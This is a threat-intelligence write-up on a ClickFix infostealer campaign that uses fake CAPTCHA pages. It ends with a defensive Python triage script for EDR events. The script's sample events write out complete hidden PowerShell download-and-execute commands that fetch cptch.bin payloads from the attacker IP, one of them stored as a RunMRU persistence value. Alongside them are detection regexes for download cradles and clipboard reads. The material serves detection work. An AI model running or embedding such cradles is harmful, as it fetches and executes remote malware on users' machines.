Malware Campaign Uses Fake CAPTCHA to Deploy Advanced Infostealer Targeting Browsers and Crypto Wallets

ClickFix Infostealer Campaign Exploits Fake CAPTCHA to Deploy Malware

A sophisticated malware campaign uses deceptive CAPTCHA verification pages to trick users into executing malicious commands, which in turn deploy an advanced information-stealing malware. This campaign, identified in early 2026, exhibits significant similarities to the ClickFix attacks that targeted restaurant reservation systems in July 2025. The attackers have refined their social engineering tactics to bypass traditional security measures and gain initial access to victim systems.

Attack Methodology

The attack begins when a user visits a compromised website that displays a fake CAPTCHA verification page. This page deceives the victim into copying a malicious PowerShell command to their clipboard and executing it manually. This ClickFix technique exploits human interaction to evade automated security sandboxes, which typically analyze file downloads rather than manual command executions.

Once the command is executed, it initiates a download from the attacker’s infrastructure, specifically the IP address 91.92.240.219. The malware reads the clipboard via specific API calls to verify the user’s action before proceeding. This multi-stage infection process is designed to steal sensitive data from a wide range of applications, including over twenty-five web browsers, cryptocurrency wallets like MetaMask, and enterprise VPN configurations.

Process Injection and Persistence

To maintain stealth on infected devices, the malware employs advanced process injection techniques. After the initial PowerShell execution, it downloads a position-independent shellcode file named `cptch.bin` from the attacker’s infrastructure. The shellcode was generated with the Donut framework, which lets the payload execute directly in memory. Analysts also observed an operational security error: the attacker’s script used the variable `$finalPayload`, which Microsoft Defender flagged.

The shellcode allocates memory within benign processes like `svchost.exe` using standard Windows APIs such as `VirtualAlloc` to conceal its malicious activity. To ensure the infection survives system reboots, the attackers modify the `RunMRU` registry key. This modification forces the machine to re-execute the malicious PowerShell command upon startup, re-initiating the payload download. Additionally, the attackers rotate payload filenames, such as `cptchbuild.bin`, to bypass hash-based blocking mechanisms.

Implications and Recommendations

The impact of this campaign is severe, granting attackers access to critical credentials and financial assets. This access allows them to monetize compromised accounts or pivot deeper into corporate networks. Organizations should educate users about the risks of running commands from web pages. Security teams must monitor for unusual PowerShell execution and specific registry modifications. Implementing endpoint detection rules that flag clipboard data reading by browser processes can help identify this attack early.
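As an added example (not code from the article or from the campaign analysis), the triage logic below scores normalised process-creation and registry events for the indicators the article names: clipboard reads, download cradles, in-memory execution, hidden windows, the 91.92.240.219 infrastructure and `cptch*.bin` payload names, plus RunMRU entries that carry a PowerShell cradle. The event field names, regexes and sample events are constructed assumptions, not real telemetry.

```python
import re

# Detection rules for the ClickFix chain described above. The IP and payload
# filenames come from the article; the regexes themselves are assumptions.
COMMAND_RULES = {
    "clipboard_read": re.compile(r"Get-Clipboard|Clipboard\]::GetText", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "inmemory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "known_infra": re.compile(r"91\.92\.240\.219|cptch\w*\.bin", re.I),
}
RUNMRU_KEY = re.compile(r"\\Explorer\\RunMRU\\", re.I)
THRESHOLD = 2  # two independent indicators in one command line -> alert

def score_command(cmdline):
    """Names of the rules a PowerShell command line matches."""
    return [name for name, pat in COMMAND_RULES.items() if pat.search(cmdline)]

def triage(event):
    """Return (alert, reasons) for one normalised EDR event (constructed schema)."""
    if event["type"] == "ProcessCreate" and "powershell" in event["image"].lower():
        hits = score_command(event["cmdline"])
        return len(hits) >= THRESHOLD, hits
    if event["type"] == "RegistryValueSet" and RUNMRU_KEY.search(event["target"]):
        # A RunMRU entry containing a PowerShell cradle is the persistence
        # artefact the article describes; any single indicator is enough here.
        hits = score_command(event["data"])
        if hits:
            return True, ["runmru_entry"] + hits
    return False, []

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"$c=Get-Clipboard; IEX (New-Object Net.WebClient)"
                ".DownloadString('http://91.92.240.219/cptch.bin')\""},
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"type": "RegistryValueSet", "image": r"C:\Windows\explorer.exe",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "data": "powershell -w hidden -c \"IEX(iwr http://91.92.240.219/cptchbuild.bin)\""},
]

def run(events=SAMPLE_EVENTS):
    """Triage every event; returns the (index, reasons) pairs that alerted."""
    return [(i, triage(e)[1]) for i, e in enumerate(events) if triage(e)[0]]

if __name__ == "__main__":
    for idx, reasons in run():
        print(f"ALERT event[{idx}]: {', '.join(reasons)}")
```

The benign scheduled backup script is scored but not alerted, which is the point of requiring two independent indicators rather than matching on PowerShell alone.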